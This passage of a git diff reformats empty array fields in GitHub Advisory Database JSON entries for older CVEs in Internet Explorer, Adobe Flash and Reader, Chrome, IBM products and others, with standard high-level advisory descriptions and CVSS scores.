[ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", @@ -32,9 +28,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-hwhq-f9jj-3vwv/GHSA-hwhq-f9jj-3vwv.json b/advisories/unreviewed/2022/05/GHSA-hwhq-f9jj-3vwv/GHSA-hwhq-f9jj-3vwv.json index 7ea7e38f50f..71fc7852207 100644 --- a/advisories/unreviewed/2022/05/GHSA-hwhq-f9jj-3vwv/GHSA-hwhq-f9jj-3vwv.json +++ b/advisories/unreviewed/2022/05/GHSA-hwhq-f9jj-3vwv/GHSA-hwhq-f9jj-3vwv.json @@ -7,12 +7,8 @@ "CVE-2012-1873" ], "details": "Microsoft Internet Explorer 7 through 9 does not properly create and initialize string data, which allows remote attackers to obtain sensitive information from process memory via a crafted HTML document, aka \"Null Byte Information Disclosure Vulnerability.\"", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-j359-7wpr-qq72/GHSA-j359-7wpr-qq72.json b/advisories/unreviewed/2022/05/GHSA-j359-7wpr-qq72/GHSA-j359-7wpr-qq72.json index 5973a276282..48d27b432e5 100644 --- a/advisories/unreviewed/2022/05/GHSA-j359-7wpr-qq72/GHSA-j359-7wpr-qq72.json +++ b/advisories/unreviewed/2022/05/GHSA-j359-7wpr-qq72/GHSA-j359-7wpr-qq72.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", @@ -31,9 +29,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-j3xp-2h4g-x5xg/GHSA-j3xp-2h4g-x5xg.json b/advisories/unreviewed/2022/05/GHSA-j3xp-2h4g-x5xg/GHSA-j3xp-2h4g-x5xg.json index b44b7459ab9..74750bbda96 100644 --- a/advisories/unreviewed/2022/05/GHSA-j3xp-2h4g-x5xg/GHSA-j3xp-2h4g-x5xg.json +++ b/advisories/unreviewed/2022/05/GHSA-j3xp-2h4g-x5xg/GHSA-j3xp-2h4g-x5xg.json @@ -7,12 +7,8 @@ "CVE-2012-2036" ], "details": "Integer overflow in Adobe Flash Player before 10.3.183.20 and 11.x before 11.3.300.257 on Windows and Mac OS X; before 10.3.183.20 and 11.x before 11.2.202.236 on Linux; before 11.1.111.10 on Android 2.x and 3.x; and before 11.1.115.9 on Android 4.x, and Adobe AIR before 3.3.0.3610, allows attackers to execute arbitrary code via unspecified vectors.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-j47j-98xg-hf9r/GHSA-j47j-98xg-hf9r.json b/advisories/unreviewed/2022/05/GHSA-j47j-98xg-hf9r/GHSA-j47j-98xg-hf9r.json index ffb91c24516..2c0422f8b92 100644 --- a/advisories/unreviewed/2022/05/GHSA-j47j-98xg-hf9r/GHSA-j47j-98xg-hf9r.json +++ b/advisories/unreviewed/2022/05/GHSA-j47j-98xg-hf9r/GHSA-j47j-98xg-hf9r.json @@ -7,12 +7,8 @@ "CVE-2015-6708" ], "details": "The ANStartApproval method in Adobe Reader and Acrobat 10.x before 10.1.16 and 11.x before 11.0.13, Acrobat and Acrobat Reader DC Classic before 2015.006.30094, and Acrobat and Acrobat Reader DC Continuous before 2015.009.20069 on Windows and OS X allows attackers to bypass JavaScript API execution restrictions via unspecified vectors, a different vulnerability than CVE-2015-6707, CVE-2015-6709, CVE-2015-6710, CVE-2015-6711, CVE-2015-6712, CVE-2015-6713, CVE-2015-6714, CVE-2015-6715, CVE-2015-6716, CVE-2015-6717, CVE-2015-6718, CVE-2015-6719, CVE-2015-6720, CVE-2015-6721, CVE-2015-6722, CVE-2015-6723, CVE-2015-6724, CVE-2015-6725, CVE-2015-7614, CVE-2015-7616, CVE-2015-7618, CVE-2015-7619, CVE-2015-7620, and CVE-2015-7623.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", @@ -32,9 +28,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-j4j8-cr4p-pgmg/GHSA-j4j8-cr4p-pgmg.json b/advisories/unreviewed/2022/05/GHSA-j4j8-cr4p-pgmg/GHSA-j4j8-cr4p-pgmg.json index 2455339fe5c..af0ad576be0 100644 --- a/advisories/unreviewed/2022/05/GHSA-j4j8-cr4p-pgmg/GHSA-j4j8-cr4p-pgmg.json +++ b/advisories/unreviewed/2022/05/GHSA-j4j8-cr4p-pgmg/GHSA-j4j8-cr4p-pgmg.json @@ -7,12 +7,8 @@ "CVE-2015-4548" ], "details": "EMC RSA Web Threat Detection before 5.1 SP1 allows local users to obtain root privileges by leveraging access to a service account and writing commands to a service configuration file.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", @@ -32,9 +28,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-j4j9-572f-pc42/GHSA-j4j9-572f-pc42.json b/advisories/unreviewed/2022/05/GHSA-j4j9-572f-pc42/GHSA-j4j9-572f-pc42.json index 3ac1582a520..ac3f9752b9f 100644 --- a/advisories/unreviewed/2022/05/GHSA-j4j9-572f-pc42/GHSA-j4j9-572f-pc42.json +++ b/advisories/unreviewed/2022/05/GHSA-j4j9-572f-pc42/GHSA-j4j9-572f-pc42.json @@ -7,12 +7,8 @@ "CVE-2014-6184" ], "details": "Stack-based buffer overflow in dsmtca in the client in IBM Tivoli Storage Manager (TSM) 5.4 through 5.4.3.6, 5.5 through 5.5.4.3, 6.1 through 6.1.5.6, 6.2 before 6.2.5.4, and 6.3 before 6.3.2.3 on UNIX, Linux, and OS X allows local users to gain privileges via unspecified vectors.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-j6j8-v7g3-3x5w/GHSA-j6j8-v7g3-3x5w.json b/advisories/unreviewed/2022/05/GHSA-j6j8-v7g3-3x5w/GHSA-j6j8-v7g3-3x5w.json index fbc74931798..e6ca805039a 100644 --- a/advisories/unreviewed/2022/05/GHSA-j6j8-v7g3-3x5w/GHSA-j6j8-v7g3-3x5w.json +++ b/advisories/unreviewed/2022/05/GHSA-j6j8-v7g3-3x5w/GHSA-j6j8-v7g3-3x5w.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-j7r7-2m58-fq77/GHSA-j7r7-2m58-fq77.json b/advisories/unreviewed/2022/05/GHSA-j7r7-2m58-fq77/GHSA-j7r7-2m58-fq77.json index 83b6ce47970..3b81c817781 100644 --- a/advisories/unreviewed/2022/05/GHSA-j7r7-2m58-fq77/GHSA-j7r7-2m58-fq77.json +++ b/advisories/unreviewed/2022/05/GHSA-j7r7-2m58-fq77/GHSA-j7r7-2m58-fq77.json @@ -7,12 +7,8 @@ "CVE-2010-2119" ], "details": "Microsoft Internet Explorer 6.0.2900.2180 allows remote attackers to cause a denial of service (resource consumption) via JavaScript code containing an infinite loop that creates IFRAME elements for invalid nntp:// URIs.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", @@ -28,9 +24,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-j93m-fj9q-jg26/GHSA-j93m-fj9q-jg26.json b/advisories/unreviewed/2022/05/GHSA-j93m-fj9q-jg26/GHSA-j93m-fj9q-jg26.json index 36b08a6ead9..3399a2a0fd7 100644 --- a/advisories/unreviewed/2022/05/GHSA-j93m-fj9q-jg26/GHSA-j93m-fj9q-jg26.json +++ b/advisories/unreviewed/2022/05/GHSA-j93m-fj9q-jg26/GHSA-j93m-fj9q-jg26.json @@ -7,12 +7,8 @@ "CVE-2015-1212" ], "details": "Multiple unspecified vulnerabilities in Google Chrome before 40.0.2214.111 on Windows, OS X, and Linux and before 40.0.2214.109 on Android allow attackers to cause a denial of service or possibly have other impact via unknown vectors.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", @@ -100,9 +96,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-j9vv-wcfq-mwv4/GHSA-j9vv-wcfq-mwv4.json b/advisories/unreviewed/2022/05/GHSA-j9vv-wcfq-mwv4/GHSA-j9vv-wcfq-mwv4.json index 53fc1eae0c5..01d800338ad 100644 --- a/advisories/unreviewed/2022/05/GHSA-j9vv-wcfq-mwv4/GHSA-j9vv-wcfq-mwv4.json +++ b/advisories/unreviewed/2022/05/GHSA-j9vv-wcfq-mwv4/GHSA-j9vv-wcfq-mwv4.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-jcw2-j9rw-pcgc/GHSA-jcw2-j9rw-pcgc.json b/advisories/unreviewed/2022/05/GHSA-jcw2-j9rw-pcgc/GHSA-jcw2-j9rw-pcgc.json index ae19de7417d..9049e075ac3 100644 --- a/advisories/unreviewed/2022/05/GHSA-jcw2-j9rw-pcgc/GHSA-jcw2-j9rw-pcgc.json +++ b/advisories/unreviewed/2022/05/GHSA-jcw2-j9rw-pcgc/GHSA-jcw2-j9rw-pcgc.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-jcx9-g3h6-rhr2/GHSA-jcx9-g3h6-rhr2.json b/advisories/unreviewed/2022/05/GHSA-jcx9-g3h6-rhr2/GHSA-jcx9-g3h6-rhr2.json index 8b558392ee1..a3d427a82c4 100644 --- a/advisories/unreviewed/2022/05/GHSA-jcx9-g3h6-rhr2/GHSA-jcx9-g3h6-rhr2.json +++ b/advisories/unreviewed/2022/05/GHSA-jcx9-g3h6-rhr2/GHSA-jcx9-g3h6-rhr2.json @@ -7,12 +7,8 @@ "CVE-2015-5088" ], "details": "Adobe Reader and Acrobat 10.x before 10.1.15 and 11.x before 11.0.12, Acrobat and Acrobat Reader DC Classic before 2015.006.30060, and Acrobat and Acrobat Reader DC Continuous before 2015.008.20082 on Windows and OS X allow attackers to bypass intended access restrictions and obtain sensitive information via unspecified vectors, a different vulnerability than CVE-2014-8450, CVE-2015-4449, CVE-2015-4450, CVE-2015-5089, and CVE-2015-5092.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-jcxw-wc96-m6qp/GHSA-jcxw-wc96-m6qp.json b/advisories/unreviewed/2022/05/GHSA-jcxw-wc96-m6qp/GHSA-jcxw-wc96-m6qp.json index cd0143e0642..b7374af8447 100644 --- a/advisories/unreviewed/2022/05/GHSA-jcxw-wc96-m6qp/GHSA-jcxw-wc96-m6qp.json +++ b/advisories/unreviewed/2022/05/GHSA-jcxw-wc96-m6qp/GHSA-jcxw-wc96-m6qp.json @@ -7,12 +7,8 @@ "CVE-2014-8904" ], "details": "lquerylv in cmdlvm in IBM AIX 5.3, 6.1, and 7.1 and VIOS 2.2.x allows local users to gain privileges via a crafted DBGCMD_LQUERYLV environment-variable value.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", @@ -60,9 +56,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-jg5g-qq45-3g4q/GHSA-jg5g-qq45-3g4q.json b/advisories/unreviewed/2022/05/GHSA-jg5g-qq45-3g4q/GHSA-jg5g-qq45-3g4q.json index 36e27ae8874..2d9fa37173e 100644 --- a/advisories/unreviewed/2022/05/GHSA-jg5g-qq45-3g4q/GHSA-jg5g-qq45-3g4q.json +++ b/advisories/unreviewed/2022/05/GHSA-jg5g-qq45-3g4q/GHSA-jg5g-qq45-3g4q.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-jgv7-7943-grr9/GHSA-jgv7-7943-grr9.json b/advisories/unreviewed/2022/05/GHSA-jgv7-7943-grr9/GHSA-jgv7-7943-grr9.json index 3a1afea54c4..3ad863dcbb4 100644 --- a/advisories/unreviewed/2022/05/GHSA-jgv7-7943-grr9/GHSA-jgv7-7943-grr9.json +++ b/advisories/unreviewed/2022/05/GHSA-jgv7-7943-grr9/GHSA-jgv7-7943-grr9.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:N/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-jh2q-359q-8fgg/GHSA-jh2q-359q-8fgg.json b/advisories/unreviewed/2022/05/GHSA-jh2q-359q-8fgg/GHSA-jh2q-359q-8fgg.json index ef092229a79..8c5995dd41b 100644 --- a/advisories/unreviewed/2022/05/GHSA-jh2q-359q-8fgg/GHSA-jh2q-359q-8fgg.json +++ b/advisories/unreviewed/2022/05/GHSA-jh2q-359q-8fgg/GHSA-jh2q-359q-8fgg.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", @@ -31,9 +29,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "CRITICAL", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-jhfm-prjw-6726/GHSA-jhfm-prjw-6726.json b/advisories/unreviewed/2022/05/GHSA-jhfm-prjw-6726/GHSA-jhfm-prjw-6726.json index b73af209758..a625232f9f9 100644 --- a/advisories/unreviewed/2022/05/GHSA-jhfm-prjw-6726/GHSA-jhfm-prjw-6726.json +++ b/advisories/unreviewed/2022/05/GHSA-jhfm-prjw-6726/GHSA-jhfm-prjw-6726.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-jq28-xhhr-qh2q/GHSA-jq28-xhhr-qh2q.json b/advisories/unreviewed/2022/05/GHSA-jq28-xhhr-qh2q/GHSA-jq28-xhhr-qh2q.json index f9151988063..a558627b03f 100644 --- a/advisories/unreviewed/2022/05/GHSA-jq28-xhhr-qh2q/GHSA-jq28-xhhr-qh2q.json +++ b/advisories/unreviewed/2022/05/GHSA-jq28-xhhr-qh2q/GHSA-jq28-xhhr-qh2q.json @@ -7,12 +7,8 @@ "CVE-2015-5108" ], "details": "Integer overflow in Adobe Reader and Acrobat 10.x before 10.1.15 and 11.x before 11.0.12, Acrobat and Acrobat Reader DC Classic before 2015.006.30060, and Acrobat and Acrobat Reader DC Continuous before 2015.008.20082 on Windows and OS X allows attackers to execute arbitrary code via unspecified vectors, a different vulnerability than CVE-2015-5097 and CVE-2015-5109.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-jq2v-832r-3wjq/GHSA-jq2v-832r-3wjq.json b/advisories/unreviewed/2022/05/GHSA-jq2v-832r-3wjq/GHSA-jq2v-832r-3wjq.json index db86f41d696..1a9e17bbc9c 100644 --- a/advisories/unreviewed/2022/05/GHSA-jq2v-832r-3wjq/GHSA-jq2v-832r-3wjq.json +++ b/advisories/unreviewed/2022/05/GHSA-jq2v-832r-3wjq/GHSA-jq2v-832r-3wjq.json @@ -7,12 +7,8 @@ "CVE-2015-2872" ], "details": "Multiple cross-site scripting (XSS) vulnerabilities in Trend Micro Deep Discovery Inspector (DDI) on Deep Discovery Threat appliances with software before 3.5.1477, 3.6.x before 3.6.1217, 3.7.x before 3.7.1248, 3.8.x before 3.8.1263, and other versions allow remote attackers to inject arbitrary web script or HTML via (1) crafted input to index.php that is processed by certain Internet Explorer 7 configurations or (2) crafted input to the widget feature.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-jqvp-6g4r-hp7v/GHSA-jqvp-6g4r-hp7v.json b/advisories/unreviewed/2022/05/GHSA-jqvp-6g4r-hp7v/GHSA-jqvp-6g4r-hp7v.json index 6b37fdaa8b6..b1e0175e5af 100644 --- a/advisories/unreviewed/2022/05/GHSA-jqvp-6g4r-hp7v/GHSA-jqvp-6g4r-hp7v.json +++ b/advisories/unreviewed/2022/05/GHSA-jqvp-6g4r-hp7v/GHSA-jqvp-6g4r-hp7v.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-jv2f-hvvh-4hw3/GHSA-jv2f-hvvh-4hw3.json b/advisories/unreviewed/2022/05/GHSA-jv2f-hvvh-4hw3/GHSA-jv2f-hvvh-4hw3.json index 0da41f55cbb..81f7fb3d195 100644 --- a/advisories/unreviewed/2022/05/GHSA-jv2f-hvvh-4hw3/GHSA-jv2f-hvvh-4hw3.json +++ b/advisories/unreviewed/2022/05/GHSA-jv2f-hvvh-4hw3/GHSA-jv2f-hvvh-4hw3.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-jvh4-xfwj-8h27/GHSA-jvh4-xfwj-8h27.json b/advisories/unreviewed/2022/05/GHSA-jvh4-xfwj-8h27/GHSA-jvh4-xfwj-8h27.json index c60eebbf312..7bfd4660c61 100644 --- a/advisories/unreviewed/2022/05/GHSA-jvh4-xfwj-8h27/GHSA-jvh4-xfwj-8h27.json +++ b/advisories/unreviewed/2022/05/GHSA-jvh4-xfwj-8h27/GHSA-jvh4-xfwj-8h27.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-jw7x-9hx7-cp99/GHSA-jw7x-9hx7-cp99.json b/advisories/unreviewed/2022/05/GHSA-jw7x-9hx7-cp99/GHSA-jw7x-9hx7-cp99.json index cdaf0b3e2cb..e09b1e0abda 100644 --- a/advisories/unreviewed/2022/05/GHSA-jw7x-9hx7-cp99/GHSA-jw7x-9hx7-cp99.json +++ b/advisories/unreviewed/2022/05/GHSA-jw7x-9hx7-cp99/GHSA-jw7x-9hx7-cp99.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-jxfm-65m8-c9cm/GHSA-jxfm-65m8-c9cm.json b/advisories/unreviewed/2022/05/GHSA-jxfm-65m8-c9cm/GHSA-jxfm-65m8-c9cm.json index 5c8f077b0b1..d2f6331e1e1 100644 --- a/advisories/unreviewed/2022/05/GHSA-jxfm-65m8-c9cm/GHSA-jxfm-65m8-c9cm.json +++ b/advisories/unreviewed/2022/05/GHSA-jxfm-65m8-c9cm/GHSA-jxfm-65m8-c9cm.json @@ -7,12 +7,8 @@ "CVE-2012-2039" ], "details": "Adobe Flash Player before 10.3.183.20 and 11.x before 11.3.300.257 on Windows and Mac OS X; before 10.3.183.20 and 11.x before 11.2.202.236 on Linux; before 11.1.111.10 on Android 2.x and 3.x; and before 11.1.115.9 on Android 4.x, and Adobe AIR before 3.3.0.3610, allows attackers to execute arbitrary code or cause a denial of service (NULL pointer dereference) via unspecified vectors.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-m272-q487-qcjg/GHSA-m272-q487-qcjg.json b/advisories/unreviewed/2022/05/GHSA-m272-q487-qcjg/GHSA-m272-q487-qcjg.json index 8fc1cb1bc6d..25148924237 100644 --- a/advisories/unreviewed/2022/05/GHSA-m272-q487-qcjg/GHSA-m272-q487-qcjg.json +++ b/advisories/unreviewed/2022/05/GHSA-m272-q487-qcjg/GHSA-m272-q487-qcjg.json @@ -7,12 +7,8 @@ "CVE-2015-5086" ], "details": "Adobe Reader and Acrobat 10.x before 10.1.15 and 11.x before 11.0.12, Acrobat and Acrobat Reader DC Classic before 2015.006.30060, and Acrobat and Acrobat Reader DC Continuous before 2015.008.20082 on Windows and OS X allow attackers to bypass JavaScript API execution restrictions via unspecified vectors, a different vulnerability than CVE-2015-4435, CVE-2015-4438, CVE-2015-4441, CVE-2015-4445, CVE-2015-4447, CVE-2015-4451, CVE-2015-4452, and CVE-2015-5085.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", @@ -32,9 +28,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-m279-9hjh-j647/GHSA-m279-9hjh-j647.json b/advisories/unreviewed/2022/05/GHSA-m279-9hjh-j647/GHSA-m279-9hjh-j647.json index 3f6dee3ede3..13e4b6268db 100644 --- a/advisories/unreviewed/2022/05/GHSA-m279-9hjh-j647/GHSA-m279-9hjh-j647.json +++ b/advisories/unreviewed/2022/05/GHSA-m279-9hjh-j647/GHSA-m279-9hjh-j647.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-m2wh-gpjv-j5rm/GHSA-m2wh-gpjv-j5rm.json b/advisories/unreviewed/2022/05/GHSA-m2wh-gpjv-j5rm/GHSA-m2wh-gpjv-j5rm.json index 4af34247fa6..3e0dedbd894 100644 --- a/advisories/unreviewed/2022/05/GHSA-m2wh-gpjv-j5rm/GHSA-m2wh-gpjv-j5rm.json +++ b/advisories/unreviewed/2022/05/GHSA-m2wh-gpjv-j5rm/GHSA-m2wh-gpjv-j5rm.json @@ -7,12 +7,8 @@ "CVE-2015-5099" ], "details": "Use-after-free vulnerability in Adobe Reader and Acrobat 10.x before 10.1.15 and 11.x before 11.0.12, Acrobat and Acrobat Reader DC Classic before 2015.006.30060, and Acrobat and Acrobat Reader DC Continuous before 2015.008.20082 on Windows and OS X allows attackers to execute arbitrary code via unspecified vectors, a different vulnerability than CVE-2015-4448, CVE-2015-5095, CVE-2015-5101, CVE-2015-5111, CVE-2015-5113, and CVE-2015-5114.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-m365-c8vq-jmfw/GHSA-m365-c8vq-jmfw.json b/advisories/unreviewed/2022/05/GHSA-m365-c8vq-jmfw/GHSA-m365-c8vq-jmfw.json index a163ffe5e6e..57518eeca3b 100644 --- a/advisories/unreviewed/2022/05/GHSA-m365-c8vq-jmfw/GHSA-m365-c8vq-jmfw.json +++ b/advisories/unreviewed/2022/05/GHSA-m365-c8vq-jmfw/GHSA-m365-c8vq-jmfw.json @@ -7,12 +7,8 @@ "CVE-2015-6712" ], "details": "The ANSendApprovalToAuthorEnabled method in Adobe Reader and Acrobat 10.x before 10.1.16 and 11.x before 11.0.13, Acrobat and Acrobat Reader DC Classic before 2015.006.30094, and Acrobat and Acrobat Reader DC Continuous before 2015.009.20069 on Windows and OS X allows attackers to bypass JavaScript API execution restrictions via unspecified vectors, a different vulnerability than CVE-2015-6707, CVE-2015-6708, CVE-2015-6709, CVE-2015-6710, CVE-2015-6711, CVE-2015-6713, CVE-2015-6714, CVE-2015-6715, CVE-2015-6716, CVE-2015-6717, CVE-2015-6718, CVE-2015-6719, CVE-2015-6720, CVE-2015-6721, CVE-2015-6722, CVE-2015-6723, CVE-2015-6724, CVE-2015-6725, CVE-2015-7614, CVE-2015-7616, CVE-2015-7618, CVE-2015-7619, CVE-2015-7620, and CVE-2015-7623.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", @@ -32,9 +28,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-m42w-g7pg-9j84/GHSA-m42w-g7pg-9j84.json b/advisories/unreviewed/2022/05/GHSA-m42w-g7pg-9j84/GHSA-m42w-g7pg-9j84.json index e81d46d2148..22b132521c3 100644 --- a/advisories/unreviewed/2022/05/GHSA-m42w-g7pg-9j84/GHSA-m42w-g7pg-9j84.json +++ b/advisories/unreviewed/2022/05/GHSA-m42w-g7pg-9j84/GHSA-m42w-g7pg-9j84.json @@ -7,12 +7,8 @@ "CVE-2015-6703" ], "details": "The loadFlashMovie function in Adobe Reader and Acrobat 10.x before 10.1.16 and 11.x before 11.0.13, Acrobat and Acrobat Reader DC Classic before 2015.006.30094, and Acrobat and Acrobat Reader DC Continuous before 2015.009.20069 on Windows and OS X allows attackers to obtain sensitive information from process memory via invalid arguments, a different vulnerability than CVE-2015-6697, CVE-2015-6699, CVE-2015-6700, CVE-2015-6701, CVE-2015-6702, and CVE-2015-6704.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-m4cc-hx9x-r2qr/GHSA-m4cc-hx9x-r2qr.json b/advisories/unreviewed/2022/05/GHSA-m4cc-hx9x-r2qr/GHSA-m4cc-hx9x-r2qr.json index eb9dd135466..6051d4b102f 100644 --- a/advisories/unreviewed/2022/05/GHSA-m4cc-hx9x-r2qr/GHSA-m4cc-hx9x-r2qr.json +++ b/advisories/unreviewed/2022/05/GHSA-m4cc-hx9x-r2qr/GHSA-m4cc-hx9x-r2qr.json @@ -7,12 +7,8 @@ "CVE-2015-5098" ], "details": "Heap-based buffer overflow in Adobe Reader and Acrobat 10.x before 10.1.15 and 11.x before 11.0.12, Acrobat and Acrobat Reader DC Classic before 2015.006.30060, and Acrobat and Acrobat Reader DC Continuous before 2015.008.20082 on Windows and OS X allows attackers to execute arbitrary code via unspecified vectors, a different vulnerability than CVE-2015-5096 and CVE-2015-5105.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-m5pq-9mp5-8ff4/GHSA-m5pq-9mp5-8ff4.json b/advisories/unreviewed/2022/05/GHSA-m5pq-9mp5-8ff4/GHSA-m5pq-9mp5-8ff4.json index 4d14702b2d0..4951ba72256 100644 --- a/advisories/unreviewed/2022/05/GHSA-m5pq-9mp5-8ff4/GHSA-m5pq-9mp5-8ff4.json +++ b/advisories/unreviewed/2022/05/GHSA-m5pq-9mp5-8ff4/GHSA-m5pq-9mp5-8ff4.json @@ -7,12 +7,8 @@ "CVE-2012-1875" ], "details": "Microsoft Internet Explorer 8 does not properly handle objects in memory, which allows remote attackers to execute arbitrary code by accessing a deleted object, aka \"Same ID Property Remote Code Execution Vulnerability.\"", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-m67w-v6pq-c7w8/GHSA-m67w-v6pq-c7w8.json b/advisories/unreviewed/2022/05/GHSA-m67w-v6pq-c7w8/GHSA-m67w-v6pq-c7w8.json index 93fc706b961..aa35badb0cc 100644 --- a/advisories/unreviewed/2022/05/GHSA-m67w-v6pq-c7w8/GHSA-m67w-v6pq-c7w8.json +++ 